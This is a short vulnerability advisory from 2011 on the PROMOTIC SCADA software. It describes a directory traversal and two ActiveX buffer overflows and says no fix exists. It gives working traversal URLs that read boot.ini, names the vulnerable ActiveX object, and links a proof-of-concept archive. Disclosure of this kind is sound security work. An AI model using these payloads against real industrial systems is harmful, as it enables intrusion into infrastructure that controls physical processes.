####################################################################### Luigi Auriemma Application: Microsys PROMOTIC http://www.promotic.eu/en/promotic/scada-pm.htm Versions: <= 8.1.4 Platforms: Windows Bugs: A] directory traversal B] ActiveX SaveCfg stack overflow C] ActiveX AddTrend heap overflow Exploitation: remote Date: 13 Oct 2011 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "PROMOTIC is a complex SCADA object software tool for creating applications that monitor, control and display technological processes in various industrial areas." ####################################################################### ======= 2) Bugs ======= ---------------------- A] directory traversal ---------------------- Directory traversal through the directory containing the files. This path can have various names specified by the project like "dir" for the AppExamples.pra example or "webdir" for demo.pra and so on. --------------------------------- B] ActiveX SaveCfg stack overflow --------------------------------- Stack overflow via the SaveCfg method of the object 02000002-9DFA-4B37-ABE9-1929F4BCDEA2. --------------------------------- C] ActiveX AddTrend heap overflow --------------------------------- Heap overflow via the AddTrend method. Note that the ActiveX object could require the acknoledge of the user for being executed. ####################################################################### =========== 3) The Code =========== A] http://SERVER/webdir/..\..\..\..\..\boot.ini http://SERVEr/webdir/../../../../../boot.ini B] http://aluigi.org/poc/promotic_1.zip ####################################################################### ====== 4) Fix ====== No fix. #######################################################################